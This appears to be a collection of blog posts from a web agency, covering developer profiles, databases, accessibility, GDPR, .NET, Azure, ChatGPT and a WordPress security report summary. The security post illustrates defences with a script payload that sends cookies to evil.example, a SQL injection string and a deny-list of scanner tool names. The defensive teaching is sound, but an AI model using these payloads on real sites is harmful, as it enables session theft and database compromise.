“When code is able to drive tech to achieve something, to make people’s lives a little bit better, that’s when the magic happens” – Moz
National Coding Week runs from 18 – 25 September, with the aim of inspiring children and adults to pursue careers in technology. In support of this, we sat down with our developers to find out what made them start coding and why they still love it…
“There is always a new puzzle to solve.”
My journey into programming was sparked by an early fascination with computers. Some of my earliest memories involve my dad teaching me how to set up and play games on our ageing Commodore 64.
We decided to start a family business creating websites. I initially took on the hardware and support aspects, but as time went on, I started delving into the intricacies of software and how websites functioned, and started learning PHP, MySQL, and Linux. I have continued to work with these skills throughout my career in programming.
The day-to-day work is generally interesting: there is always a new puzzle to solve, and with that comes a great sense of satisfaction when you elegantly solve a challenging problem.
My favourite project I’ve worked on was IFLScience, mostly because of its scale and the challenges/solutions that come along with that. (I had nothing to do with the current site, all the parts I worked on have been relegated to history).
My favourite Infotex project would probably have to be the Children’s Commissioner site; it had some interesting challenges and was overall a fun project.
We used a tool called the WordPress Page Builder to help us make the website. It’s like building with colourful blocks, and it’s fun!
“Pragmatic use of tech driven by code can help to progress a career.”
I’ve had an interest since the 1990s (before we had graphical interfaces); it started out as batch files and quickly turned into QBasic. At secondary school I unknowingly took the next step when I created a Visual Basic for DOS (disk operating system) maths educational program to fill a need for one of our teachers, who went on to use it more widely, to the annoyance of the IT department.
For me programming is a means to an end: when code is able to drive tech to achieve something, to make people’s lives a little bit better, that’s when the magic happens. At work that might be the ability for code to analyse a body of data that humans couldn’t practically do, or for a business to succeed in ways it otherwise couldn’t.
Outside of work I’ve long been fascinated by the interconnection between code and the real world. Things like Raspberry Pis or Arduinos that allow relatively small amounts of code to either control or monitor physical real-world items are a particular favourite of mine.
I used code to take thousands of news stories and change them to work on a different system to help keep a little bit of car history alive.
I’d look at it the other way: that pragmatic use of tech driven by code can help to progress a career.
The fact that things like Amazon’s solutions allow us to write just a few lines of code to create, and modify, entire virtual worlds is very powerful. It’s starting to become possible within the SME arena to couple things like this to relatively large, even real-time, data processing systems. One can imagine some very cool solutions just over the horizon: a few lines of code determining how a system should dynamically handle some event – scaling resources down to avoid wasting energy at quiet times, for example, or responding to a high-load attack by filtering traffic and/or increasing capacity.
“I can’t choose a favourite project, it would be like picking a favourite child!”
I was working in a company that made paint colour cards and various promotional materials, and the production manager and I spent a lot of our time programming in Excel to handle customer stocks. I realised I preferred that to the rest of my job, so I left to do an MSc in Advanced IT, specialising in software development.
I love the problem-solving aspect of programming; I still get a buzz when I figure out a way of doing something that’s been puzzling me for a while.
I can’t choose a favourite project, it would be like picking a favourite child!
I’m working on an App that will help to make it easier for people to learn about forests and have fun outdoors.
“That moment at the start of a programming project when there are so many possibilities is still very exciting”
When I was a kid, we had an Intel 8088 machine which I used to write simple text adventures in GW Basic. It was a relatively simple programming language that taught me the basics of variable assignments and looping. I think we are missing something simple like GW Basic in today’s early learning.
Creating an empty folder and then structuring and writing files and code to produce something that people can interact with. That moment at the start of a programming project when there are so many possibilities is still very exciting.
I’m currently experimenting with ways to talk to a computer in English so that it can do complicated things for me in a program I’ve written.
There are always new and interesting things to play with in development so it’s easy to find lots to be excited by.
I have a 4 year old and I’m looking forward to seeing how he interacts with computers. I hope that the modern curriculum places a greater emphasis on interacting with, and particularly programming, computers.
Outside of that I’m very interested in AI and how I can use it in my programming.
“I enjoy seeing the end product and how it helps people out, making their lives easier”
By accident. I had a degree in Economics, but didn’t want to go into finance. I took a business NVQ while looking for a job, and ended up helping the other students with the computer parts of the course. This led to a job in IT training, which was short lived, then to a job in software support, which slowly introduced software development.
When it goes well, I enjoy seeing the end product and how it helps people out – making their lives easier.
An application for running woodland courses, which allows users to register their interest in a course and then say how they feel on each day of the course.
“I’m excited about seeing how AI will provide an opportunity to transform the way coding is carried out”
My first experience with coding was as a child running simple commands using BASIC on my dad’s ZX Spectrum. As there were no formal coding lessons at school, it was not until university that I had the opportunity to explore programming in greater detail. It was there that I started using FORTRAN to simulate physics experiments, and this was the point at which I developed a passion for coding. I much preferred this to the time-consuming setup and repetition of experiments with physical equipment.
I enjoy the sense of achievement once something is working as it should, and the ability to connect different systems to allow them to communicate with one another.
I have been working on a website which shows different items which can be bought from the website’s business.
I wrote a list of instructions which is called code. When a person visits the website the code that I have written will show the words in different sizes and using different colours. This code allows the people to view the website on a phone, tablet or computer and to have a clear layout on any device.
This coding also allowed information to be taken from the old website to the new one.
I’m excited about seeing how AI will provide an opportunity to transform the way coding is carried out with the potential to aid debugging of issues and testing.
Read more about National Coding Week and see how you can get involved.
Often we’ll hear people describe their Excel spreadsheets as ‘databases’. Whilst an Excel spreadsheet can contain a treasure trove of vital information for a business, it isn’t, strictly speaking, a database.
As a system developer, when someone says ‘database’ to me, I think of a tool that organises data in a structured way, protects it from inadvertent updates and deletions, and makes the data available to the right people in the right place at the right time.
A relational database allows data to be stored in one place but referenced in many others. As a simple example, you can keep a list of customers in one table, link each customer to a table of orders, and also to a table containing the contact history for that customer. If we need to update anything for a customer, we update it once and everything related sees that update.
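As an illustrative sketch of that customer/orders relationship – using SQLite from Python rather than a production database, with invented table and column names:

```python
import sqlite3

# One table of customers, referenced by a separate table of orders.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE customers (
        id    INTEGER PRIMARY KEY,
        name  TEXT,
        email TEXT
    );
    CREATE TABLE orders (
        id          INTEGER PRIMARY KEY,
        customer_id INTEGER REFERENCES customers(id),
        total       REAL
    );
""")
conn.execute("INSERT INTO customers (id, name, email) VALUES (1, 'Acme Ltd', 'old@example.com')")
conn.execute("INSERT INTO orders (customer_id, total) VALUES (1, 99.50)")
conn.execute("INSERT INTO orders (customer_id, total) VALUES (1, 12.00)")

# Update the customer's email once...
conn.execute("UPDATE customers SET email = 'new@example.com' WHERE id = 1")

# ...and every related order sees the change via the join.
rows = conn.execute("""
    SELECT c.name, c.email, o.total
    FROM orders o JOIN customers c ON c.id = o.customer_id
    ORDER BY o.id
""").fetchall()
print(rows)
```

Because the email lives in exactly one row of `customers`, there is no risk of two orders disagreeing about it – the core benefit over a spreadsheet where the same value is copied into many cells.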
Almost all the systems I work with are built using Microsoft SQL Server as a database (Gareth works in our Systems team, dealing with bespoke applications for the health sector). I’ve been working with SQL Server (pronounced ‘sequel’) since the year 2000. In those days I was taken into a freezing cold air-conditioned server room and told that the big box in the corner, which looked like a larger version of the PC on my desk albeit with a built-in tape deck for backup purposes, was the SQL Server. Even back then, we’d rarely interact physically with the machine itself, instead using tools on our own computers that could connect to it to get data from it or to write programs that inserted and worked with the data on it.
I learnt about how you could take backups of the data in your database as frequently as you wanted, and about a thing called a ‘transaction log’ which recorded everything that was updated in the database. You could even use it to almost go back in time to see what the database looked like prior to a change. I also learned that SQL Server could use things called indexes, a subset of your data that could be used to show things on screen or in reports much more quickly than you could do it if you were getting all of the data.
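The effect of an index can be shown in miniature. This sketch uses SQLite from Python rather than SQL Server itself, but the principle – the query planner switching from a full scan to an index search – is the same:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE readings (id INTEGER PRIMARY KEY, sensor TEXT, value REAL)")
conn.executemany(
    "INSERT INTO readings (sensor, value) VALUES (?, ?)",
    ((f"sensor-{i % 500}", float(i)) for i in range(100_000)),
)

query = "SELECT * FROM readings WHERE sensor = 'sensor-42'"

# Without an index the planner must scan every row...
before = conn.execute("EXPLAIN QUERY PLAN " + query).fetchall()

# ...after adding one, it jumps straight to the matching subset.
conn.execute("CREATE INDEX idx_readings_sensor ON readings (sensor)")
after = conn.execute("EXPLAIN QUERY PLAN " + query).fetchall()

print(before)  # a SCAN of the table
print(after)   # a SEARCH using idx_readings_sensor
```

On a table of millions of rows the difference between the two plans is what turns a slow report into an instant one.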
The systems we were building became more and more complicated, and as they contained health-related data we learnt how to encrypt data within the database so it was only accessible to people with the correct permissions level. With hundreds of users accessing data at the same time, all wanting instant responses, we identified ways of getting data out of SQL Server as quickly as possible.
Nowadays there are many different ways of using SQL Server. Dedicated physical servers are less common given the flexibility offered by virtual servers and even cloud-based servers, meaning it is possible to have SQL Servers in different locations, even different continents, that synchronise data between them, making globally connected systems easy to implement. Microsoft’s Azure services include a product called SQL Database, which can scale up the processing power available to it as a system grows. Microsoft take care of managing the availability of the database, and as developers we can concentrate on getting your system running as fast as possible.
So if you’re using Excel as a database or have spreadsheets that are becoming unmanageable, get in touch and we’ll help you to secure that important business data.
Put simply, web accessibility means ensuring that websites or mobile apps are usable by as many people as possible. This includes those with vision or hearing impairments, motor difficulties, and cognitive impairments or learning disabilities.
Accessibility also refers to making websites and apps usable for people with more situational limitations, such as people using mobile phones, older people, people in locations where they cannot play sound, people with ‘temporary disabilities’ such as injuries or lost glasses, or people with socio-economic limitations such as slow Internet connection.
Accessibility is important for ensuring that everyone has equal access to information online. It aims to remove barriers for users with disabilities and impairments who might otherwise struggle to access online content. Around twenty percent of the UK population have a long-term illness, impairment or disability.
Accessibility is particularly important for public sector websites and apps, because they often provide essential services that everyone must be able to access.
On top of this, making your website or app accessible is beneficial to every user. Accessible websites are often faster, clearer, have better user journeys, and could rank higher on search engine results.
All public sector bodies have to meet the accessibility regulations that came into force in 2018, unless they are exempt or partially exempt (such as schools).
These requirements outline the need for websites and apps to be ‘perceivable, operable, understandable, and robust’ for as many people as possible.
Non-public sector organisations and businesses are not required by law to reach these same accessibility standards for their websites. However, there are numerous benefits to making websites as accessible as possible.
There are many ways to make your website accessible; some are simpler than others.
For a thorough look at what can be done, designers and developers refer to the Web Content Accessibility Guidelines (WCAG). It is usually more effective to incorporate accessibility from the start of a project, rather than returning to re-do work.
If these guidelines seem like a lot to take in, hear from one of our designers, Alice, for simple ways to make your website accessible.
Got questions about the accessibility of your website or app? Don’t hesitate to get in touch.
Our recent launch of the new website for the Children’s Commissioner had to meet the WCAG AA Standard. The website audience is diverse, aimed at children and young people as well as teachers, parents and the media. Combining three priority areas identified by the Commissioner into one comprehensive website, it was vital that all of the detailed reports, articles and publications are easy to read and view across multiple devices, platforms and screen readers.
We worked with Suffolk County Council to create a new website promoting Suffolk as the ‘Greenest County’. With a wealth of content (totalling over 300 pages), the website needed to meet accessibility guidelines to ensure that everyone is able to read about their inspirational work. Check out their website: greensuffolk.org
Greenpixie provides cloud emissions data to help companies take control of their carbon footprint, reduce spending, and lower their emissions.
We spoke to the CEO of the company, former Infotex employee John Ridd, to find out a bit more about his journey, cloud computing emissions, and Greenpixie’s mission to help reduce them.
It would have been about two years ago from ideation, when my co-founder Will, now CTO of the company, and I had the idea during a hackathon. We had heard about digital emissions making up over 2% of global emissions, which was more than that of the entire aviation industry.
We felt that there was a real business opportunity to quantify this issue and perhaps reduce it using the scalability of digital and the availability of data for this particular sustainability issue.
We created an MVP (Minimum Viable Product) and first focused on websites: we came up with a way to quickly estimate the emissions of our website homepage, which we sent out via email marketing and got a lot of responses – we thought, we’re onto something here! That started our journey into digital sustainability. It just so happened we didn’t end up doing websites, but cloud computing emissions, however the principles that we started with remained the same: a scalable way to measure and reduce digital emissions.
By 2030, digital emissions are predicted to be over 10% of global emissions due to continuing demand for data. A large share of these digital emissions comes from cloud computing, but also from the internet itself; ChatGPT, streaming services – it all ends up at data centres, which suck up an incredible amount of electricity. A lot of metals and rare minerals are used to create all this server hardware and continually replenish it – I think the average lifespan of a server in a data centre for cloud computing is only about four years. A recent Telegraph article refers to data centres outside of London as ‘energy vampires’ because of their electricity usage impacting residential build plans.
It’s a combination of those two things: the huge amount of electricity used, and the materials and minerals needed. There’s also a third dimension, which is water usage. Data centres take in a colossal amount of water in order to keep things cool. One example is a data centre in Nevada, recently covered in BBC Panorama’s Is the Cloud Killing the Planet?, which used one billion litres of water a year.
That gives you an idea of how our digital world and cloud computing actually causes a very big sustainability issue.
This problem is really a business and enterprise problem. It’s not going to change from us at home not watching Netflix so much, or reducing our own digital emissions, because that’s a drop in the ocean compared to where the problem lies, which is with businesses and enterprise. So we focus on cloud computing.
Software engineers in companies essentially rent servers from data centres owned by Amazon, Google and Microsoft, through platforms such as Microsoft Azure or AWS. Hundreds or even thousands of tons of emissions are created from renting all these servers. Currently, there’s no real way for companies to get reliable cloud computing emissions data. This is partly because cloud providers aren’t transparent enough, and partly because multi-cloud setups within companies make it hard to produce figures that are genuinely compliant with regulation.
Secondly, the big factor, which we focus on, is that there’s a large amount of cloud waste in the way enterprises utilise the cloud. Software engineers over-purchase server space when they are building out the tech infrastructure for companies. This means that around 30% of the servers being turned on, left on and used don’t need to be. So there’s 30% more emissions, which also correlates with a 30% overspend that companies are paying.
What Greenpixie does is provide companies with the data needed to comply with the latest regulations. One of the big ones is the CSRD coming through the EU, which makes companies responsible for their cloud computing emissions; these fall under Scope 3 (the supply chain) in the ESG framework. Secondly, we enable software engineers to reduce emissions at source: we quantify the emissions that are being wasted, and then they can clean up the waste through the way they’re building out their tech, saving money as they do it.
I would say when it comes to digital emissions, they’re very actionable and very measurable when the right tools are out there. I’m actually very optimistic that we can reduce this ‘10% or more’ figure by 2030.
The truth is that doing it for the good of the planet normally doesn’t fly when it comes to business priorities, because everyone has so many other priorities. For leadership teams to have successful sustainability initiatives that reduce at source, there need to be cost incentives, which we provide. We’re optimistic that this approach is going to be adopted and that a lot of emissions are going to be prevented.
Through a wider sustainability lens, there’s been a move away from offsetting, because really what that is in practice is companies outsourcing their responsibility. There’s some high-profile anti-greenwashing legislation coming through which is going to stop companies getting away with that. As long as we are clever in incentivising enterprises to reduce their emissions, we can get there. Cloud is a really good example of that, I think.
We covered cloud emissions at COP 27 for the first time. And we have a really amazing advisory board that opens up opportunities like this.
There is responsibility when it comes to putting out the best information, but there’s a real network of businesses in industry sustainability at this point. So there are institutions, such as the SDIA (Sustainable Digital Infrastructure Alliance), who are focusing a lot on the science behind this. There is also an open source tool, Cloud Carbon Footprint, which we’ve built upon and improved to be able to give emissions data. We’re connected into all the information to allow us to be leaders in this space. It’s also become more mainstream now: on BBC One a couple of months ago, cloud computing emissions were covered as a top-level issue.
There is awareness now, but we were one of the first to build a business around this.
We’re fundraising in order to bring this to market in a very big way, and we’ve already got this data product that brings transparency over the issue and allows software engineers to start acting on it.
So really we want to go down the route of growing the team. We’ve got six full-time staff currently, but we want to get a lot bigger than that now we’ve brought a product to scale. So hopefully we can be servicing hundreds of companies’ cloud emissions in the near future, making enough revenue ourselves and riding the wave of what we’ve built.
Yeah, I have a lot to be thankful for from my time at Infotex. I actually did an interview fairly recently and spoke about Infotex and about Tim Webster, my first boss.
Infotex is a very giving company that enables companies like Greenpixie to emerge because of people like Tim. Infotex is generally very generous with their time and has this tech mindset that allows companies like this to be built.
The General Data Protection Regulation came into effect on 25th May 2018. Its goal is to protect the rights of individuals where personal data is being used. It does this by outlining the rights of individuals, requiring a lawful basis for the processing of personal data, and placing expectations on how personal data is managed.
In practice, it can be time-consuming and difficult to adhere to GDPR and it is not always clear how specific scenarios should be interpreted. This sometimes creates a laissez-faire attitude towards it where it can be treated as a box-ticking exercise.
At its heart, though, GDPR, when implemented correctly, benefits us all. Fundamentally, it is about understanding the breadth of the personal data you are capturing, and reviewing its journey from the individual through your business-controlled systems and processes, and often onward to third parties.
Without this process, it’s very easy to fall into a situation where you are capturing personal data without even realising it. Keep in mind that GDPR takes a fairly broad approach to what constitutes personal data (including IP addresses and cookies where they can be utilised to identify an individual). Producing a modern website is complex, and this complexity increases all the time. Whilst sometimes functionality is programmed from scratch for a specific website, there are also numerous choices when determining which third-party services to utilise or integrate with. Take something simple like an integration with a page-sharing service. Perhaps it utilises some embeddable code to render the icons and facilitate sharing. Innocent enough on the surface, but is the script capturing any data? Is any of the data personal? Where is it sent? What happens to that data? How do we request its access/deletion?
Another common example is a contact form capturing a simple message (perhaps a name, contact number, and message). This seems relatively straightforward, but there are a number of questions we should be asking. Do we need all of that data? Where is the message being sent? Is it stored anywhere? Does it get sent via email to an email client? Is that being downloaded and stored? Is it passed on to other departments within your company, or does it travel onward to other third-party systems? Would you be able to recover or delete that data if requested?
It’s important to state that GDPR does not stop you from doing these things. It asks you to consider whether you need to do them and, if you do, that you do so responsibly and transparently without infringing on the rights of individuals.
From a business perspective, there is great value in understanding your data.
We owe it to ourselves to carefully consider how we capture, process, and share personal data. We shouldn’t just implement a new service, integration, or tool without first looking at it through a data protection lens. A useful exercise is to consider whether you would be comfortable with your own personal data being processed in that way.
As a final thought, we are entering a world where AI is going to be a part of our everyday lives. AI systems require input in order to respond (either in the form of a question or, as another example, the context around something being analysed such as a piece of code). This input has the very real possibility to contain personal or sensitive data. Where does that personal data go? Who is it shared with? Can it easily be recalled/deleted? These questions do not have easy answers and it remains to be seen how AI will be regulated to provide the same protections currently offered by GDPR.
If you need help understanding your data please get in touch.
For those of us who live in the Microsoft world, .NET has been revolutionary over the last 20 years.
It enables developers to collaborate easily and write, test and fix code efficiently, as well as supporting builds for a range of different applications, including desktop apps, mobile apps, and web apps.
Our .NET applications are developed to sit behind the websites, processing data, integrating with other platforms and providing back office user functionality that is so important to make websites work effectively on the front end.
Microsoft .NET is an open source developer platform that assists the creation of various types of applications.
.NET has two main versions:
.NET Framework is the original version that Microsoft introduced back in 2002. It was a replacement for Visual Basic, which was used by many developers to build applications for Windows. This was around the time Internet technology was really taking off, with many organisations building not only websites but Intranets as well.
Alongside .NET, Microsoft also introduced Visual Studio .NET, an Integrated Development Environment (IDE). This enabled developers to write code, build it, and run it on their computers for debugging before putting it live. This IDE software is updated every couple of years.
The last version of .NET Framework, 4.8, was released in April 2019, with a security update, 4.8.1, following in August 2022.
Microsoft has now retired the .NET Framework and moved across to what was known as .NET Core before this became .NET 5 in November 2020. Through this cross-platform version, Microsoft has expanded its platform to support .NET developers looking to leverage other platforms, and to attract customers looking to build apps with other tools including Node, PHP, and Java.
As with most things Microsoft, there are continual improvements and new versions being released each year. .NET 7 was released in November 2022 with .NET 8 due to release in November 2023.
What this means for us, as developers, is there is a continuous learning process to keep up to date and keep our software as up to date as possible, as unfortunately Microsoft doesn’t support their .NET versions for very long. .NET 7 will stop being supported in May 2024.
For our customers, it means that we have to focus on keeping applications up to date, and occasionally having to rewrite these from scratch to be able to utilise new functionality and keep applications secure.
Microsoft Azure is a cloud computing platform which launched in February 2010. It is a collection of integrated services for building, deploying and hosting applications and services through a global network of Microsoft-managed data centres.
The idea behind cloud computing is that it stops organisations having to have their own data centres or collection of physical servers, which both need to be managed and are very energy inefficient. For example, data centres have to be air conditioned so that the servers don’t overheat.
It is the large-scale equivalent of your Google Drive or Microsoft OneDrive, which stores your files on big servers that you access via an internet connection, instead of on your own computer’s hard drive.
Cloud software runs on a remote server belonging to the company who makes or operates that software, and when you want to use it you access your account online.
From the 1980s to the 2000s, Microsoft’s Windows system was the go-to operating system, enabling home PC users and businesses alike to interact with their computers. But with the cloud computing revolution of the late 2000s, competitors like Amazon Web Services (launched in 2006) introduced online services for developers to make new websites and complex applications from one basic framework.
To avoid being left behind, Microsoft launched Azure, a cloud platform for .NET and other developers to work with. Microsoft has now opened up the Azure environment, adding support for non-Microsoft technologies in order to widen its appeal to all kinds of developers. Microsoft has also built a large number of technologies specifically for the Azure platform.
Compared to on-premises and some traditional hosting providers, Microsoft Azure can help increase efficiency and reduce costs. It is reliable, offering platform uptime guarantees of 99.95% and can be coupled with multi-region failover to further increase reliability.
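To put a 99.95% uptime guarantee into concrete terms, a quick back-of-the-envelope calculation (a short Python sketch, purely for illustration):

```python
# Translate an uptime percentage into permitted downtime per period.
def allowed_downtime_minutes(uptime_pct: float, period_hours: float) -> float:
    return period_hours * 60 * (1 - uptime_pct / 100)

per_month = allowed_downtime_minutes(99.95, 30 * 24)    # a 30-day month
per_year = allowed_downtime_minutes(99.95, 365 * 24)

print(f"{per_month:.1f} minutes/month")   # about 21.6 minutes
print(f"{per_year / 60:.1f} hours/year")  # about 4.4 hours
```

In other words, 99.95% allows roughly twenty minutes of downtime in a month – and multi-region failover exists to shrink even that window.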
Microsoft Azure offers a variety of services, including virtual machines, databases, storage, networking, analytics, artificial intelligence, and the Internet of Things (IoT). Infotex use many of the Azure services as part of our technical toolkit. For example, “Web Apps” is used to power some of our web applications, coupled with Azure’s cloud-based SQL database.
If you would like to discuss what would be most suitable for your needs, speak to one of our experts today.
We talk about security a lot in our articles, but we talk about it even more internally, as it’s vital we maintain safe and secure sites for our clients.
The threat intelligence team at WordPress security experts Wordfence has recently released its annual report on the state of WordPress security. As hosts of many WordPress sites, we have to understand the ever-changing landscape in which these sites exist so we can combat likely intrusion points.
The key takeaways from this year’s report are covered below.
The headline was a significant increase in the number of vulnerabilities disclosed. That sounds bad – more vulnerabilities means more problems? Not quite. There has been an increase in the number of companies acting as CVE Numbering Authorities. CVE stands for “Common Vulnerabilities and Exposures”, a publicly available catalogue of known security flaws. Historically, many WordPress issues were not reported, but the growing number and openness of these authorities has made it much simpler for people to officially disclose security problems.
As WordPress, and the majority of its plugins, are built within the open source ecosystem, anyone can download the code and analyse it. The more people who are looking, the more issues are likely to be found. Finding and reporting such issues is increasingly becoming a full-time (paid) occupation for many developers, who are rewarded through “bug bounty” programs. These ensure that the bugs don’t end up in the hands of malicious entities, and this responsible reporting helps everyone within the ecosystem.
Out of the vulnerabilities reported, the most common issue was Cross-Site Scripting (XSS): with over 1,100 reports in 2022 alone, it accounted for nearly half of all vulnerabilities disclosed. Cross-Site Scripting attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. More than a third of the XSS issues required administrative permissions on the website itself in order to be successful, so the risk was greatly reduced. This does highlight why users should only be given the minimum level of access they absolutely need. WordPress has a strong permissions architecture with varying roles (Contributor, Author, Editor, Shop Manager and Administrator are the most common), each with different abilities.
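The standard defence against XSS is to escape user-supplied content before it is rendered into a page, so that any markup it contains becomes inert text. Here is the idea sketched in Python (WordPress provides equivalents such as `esc_html()`; the attacker URL is invented):

```python
from html import escape

# A comment field containing an attempted script injection.
user_input = '<script>fetch("https://evil.example/steal?c=" + document.cookie)</script>'

# Rendered raw, this would run in every visitor's browser;
# escaped, the markup becomes harmless visible text.
safe = escape(user_input)
print(safe)
```

After escaping, the browser displays the literal text `<script>…` instead of executing it, which is exactly what a comment or profile field should do.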
Although XSS topped the vulnerability disclosures, Wordfence blocked around three times as many SQL injection attacks as XSS attacks. In a SQL injection attack, an attacker tries to run database commands through a website that has not taken care to sanitise what people enter into forms and other inputs. There was also a comparable number of malicious file upload or inclusion attacks – for example, where someone gains access to the administration area and uploads a script that grants them further access, rather than the intended image or text.
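The standard defence is the parameterised query, where user input is passed as data rather than spliced into the SQL itself. A minimal sketch using Python’s built-in SQLite module (the `find_user` helper and table are hypothetical; WordPress uses PHP prepared statements via its own database layer):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, is_admin INTEGER)")
conn.execute("INSERT INTO users VALUES ('alice', 1), ('bob', 0)")

def find_user(name: str):
    # UNSAFE would be string concatenation, where input like
    # "' OR '1'='1" rewrites the query and returns every row.
    # The "?" placeholder keeps the input as data, never as SQL.
    return conn.execute(
        "SELECT name FROM users WHERE name = ?", (name,)
    ).fetchall()

print(find_user("alice"))         # [('alice',)]
print(find_user("' OR '1'='1"))   # [] - the injection attempt matches nothing
```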
There are more and more leaked password lists available online as data breaches occur. Credential stuffing is where hackers use usernames and passwords taken from these lists to try to log in to the admin area of your site. When directories like HaveIBeenPwned (enter your email address to see which leaks your details have been part of) hold over 12 billion compromised sets of credentials, it is no wonder that Wordfence collectively blocked over 159 billion login attempts in 2022. Surprisingly, this is actually a slight decrease on 2021.
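HaveIBeenPwned also lets software check passwords against its leak database without ever transmitting them, using a k-anonymity scheme: only the first five characters of the password’s SHA-1 hash are sent, and the returned candidate suffixes are compared locally. A sketch of the local half of that exchange (no network call is made here; the range endpoint named in the comment is HaveIBeenPwned’s documented Pwned Passwords API):

```python
import hashlib

def hibp_range_query(password: str) -> tuple[str, str]:
    """Split a password's SHA-1 hash for a k-anonymity range lookup.

    Only the 5-character prefix would be sent to the service
    (GET https://api.pwnedpasswords.com/range/<prefix>); the response
    lists matching hash suffixes, which are compared locally, so the
    full password hash never leaves your machine.
    """
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]

prefix, suffix = hibp_range_query("password")
print(prefix)  # 5BAA6 - the only part ever transmitted
```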
To keep your site safe, please don’t use your WordPress login details on any other site, and make sure that when you create the password it is rated as Strong. These are good principles to apply to any site, and combining them with multi-factor authentication wherever it’s available will make things even more secure.
It has always been important to make sure that the core WordPress code, its plugins, and themes are kept up to date with the latest patches, and that is no less true now. It’s good practice for keeping your site secure, and it also extends the site’s overall lifespan: trying to upgrade very out-of-date plugins or WordPress code is extremely time consuming.
Wordfence saw that most attacks targeting specific vulnerabilities exploited known, easily exploitable flaws on sites that had not received any recent updates. Infotex will take care of your site and make sure that it’s got the latest patches to keep things running smoothly. Indeed, Wordfence stated: “As such, the greatest threat to WordPress security in 2022 was neglect in all its forms”.
The second largest category of attacks came from known malicious “User Agents”. A “User Agent” is the formal term for a browser, but it also encompasses many other ways in which website content is requested and processed. From Infotex’s own data, around 60% of all requests are typically non-human in nature.
In addition to the more legitimate search engine robots (aka “bots”), many of these requests come from bots that have no purpose on a site or system other than to attack it.
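One simple layer of defence against such traffic is a deny-list check on the User-Agent header. A minimal sketch – the substrings below are illustrative examples (names of common open-source scanners), not a real threat feed, and real products like Wordfence maintain far richer signatures:

```python
# Hypothetical deny-list of User-Agent substrings associated with
# automated attack tooling. Real deny-lists are much longer and are
# combined with IP reputation and behavioural checks.
BAD_AGENT_SUBSTRINGS = ("sqlmap", "nikto", "masscan")

def is_known_bad_agent(user_agent: str) -> bool:
    """Return True if the request's User-Agent matches the deny-list."""
    ua = user_agent.lower()
    return any(bad in ua for bad in BAD_AGENT_SUBSTRINGS)

print(is_known_bad_agent("sqlmap/1.7"))                      # True
print(is_known_bad_agent("Mozilla/5.0 (Windows NT 10.0)"))   # False
```

Note that attackers can trivially forge this header, which is why User-Agent filtering is only ever one signal among many.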
A common task for these bots is looking for webshells. A webshell is a script placed where an attacker has gained a foothold within a website, intended to let them retain control and make the server act on the attacker’s behalf. It’s commonplace for attackers to compete for access to webshells, as nefarious access to one can cause huge problems for the site’s owner. Wordfence saw over 23 billion attacks of this type in 2022 across the 4 million+ sites they protect.
The full report is available to download via Wordfence.com
There has been a lot of noise in the media over the last month about the rapid rise of AI tools such as ChatGPT, Google Bard, and Microsoft Bing’s AI-enhanced search. AI is nothing new, but ChatGPT reached 1 million users in less than a week and 100 million in under two months.
Basically, it’s a chatbot. The tool lets you provide a natural-language prompt or question, and ChatGPT responds in natural-sounding language. The bot uses the previous questions and prompts in a thread to inform its responses to later questions. Surprisingly (or perhaps to avoid the Skynet of the Terminator films), the bot doesn’t use the internet for its responses – they are based solely on the huge data set it has been trained on.
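That threading behaviour can be sketched very simply: each turn is appended to a running message list, and the whole list is what the model sees on the next turn. In this sketch, `fake_model` is a hypothetical stand-in for the real API call, which we don’t make here:

```python
def fake_model(messages):
    """Hypothetical stand-in for a chat model: real systems send the
    whole message list to the model on every turn."""
    return f"(reply based on {len(messages)} prior messages)"

history = []

def ask(prompt: str) -> str:
    """Append the user's turn, get a reply, and record it in the thread."""
    history.append({"role": "user", "content": prompt})
    reply = fake_model(history)
    history.append({"role": "assistant", "content": reply})
    return reply

ask("What is a CDN?")
print(ask("Can you give an example?"))  # the model sees both questions
```

This is also why long threads eventually hit a context limit: the full history is resent every time.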
You can request it to answer questions or be creative by writing a poem on a specific topic. Many are using it to write covering letters for job applications, solve maths problems with a step-by-step breakdown of the answer, and write code that goes into websites.
At Infotex we polled the team as to how they’d been using it. So far they have:
ChatGPT isn’t foolproof though, and even ChatGPT’s owners OpenAI note “It’s a mistake to be relying on it for anything important right now. We have lots of work to do on robustness and truthfulness.”
ChatGPT’s rapid rise has prompted Google to expedite their new AI-powered search feature ‘Bard’. This uses natural language processing and machine learning to provide more relevant and insightful information to users.
I don’t expect it to replace the traditional ‘10 blue link results’ in Google but do expect the top section of the results pages to begin including AI-generated responses and answers to questions/queries.
This could be game-changing for search in many ways:
One downside of these generated answers would be fewer clicks on the organic results, which would be frustrating for website owners looking for traffic. As it’s Google, I’d expect to see them protecting their more commercial search terms which would currently be occupied by paid ads. It wouldn’t be too difficult to keep commercial queries (“car insurance”) and general questions (“what is Newton’s third law”) separate.
At the same time, Microsoft is adding AI-generated answers to its Bing search results pages.
These are just a few examples of the many applications and uses of ChatGPT. Its versatility and ability to understand and generate human-like responses make it a valuable tool for a wide range of industries and use cases.
Everyone has their own idea of what the future will look like… but in the fast-moving digital world, the future is never far away. We’ve asked some of our team what their predictions are for the coming year. Do you agree?
The word ‘metaverse’ was runner up for the Oxford University Press Word of the Year 2022 – a telling sign of the growing conversation around a future where digital and physical worlds merge. Contributing to this future is the growing traction of Augmented Reality (AR), a type of Extended Reality (XR) that is on the rise along with Virtual Reality (VR) and others.
Note, for instance, the new World Cup FIFA+ Stadium Experience, an augmented reality overlay that allows stadium audiences to view stats, heatmaps, insights, and VAR replays on their phones while they watch the match live. This is just one of many examples of AR, a technology that brings together digital data and the physical world and is predicted to reach a global market of $50 billion by 2024. While the technology is usually implemented in mobile apps – such as Amazon’s View in Your Room feature or the Ikea Place app – it is starting to appear on websites too, such as knitted tie store Broni and Bo’s virtual try-on. AR might prove particularly beneficial to business owners in sectors such as beauty, manufacturing and tourism.
Amidst the constant buzz of online activity, brands and platforms alike are battling to create meaningful and memorable user experiences. Motion is one of the ways that your brand’s website can stand out and hold on to user attention. Implemented well, a user experience including motion can communicate a story, sequence, or transition more effectively than one without.
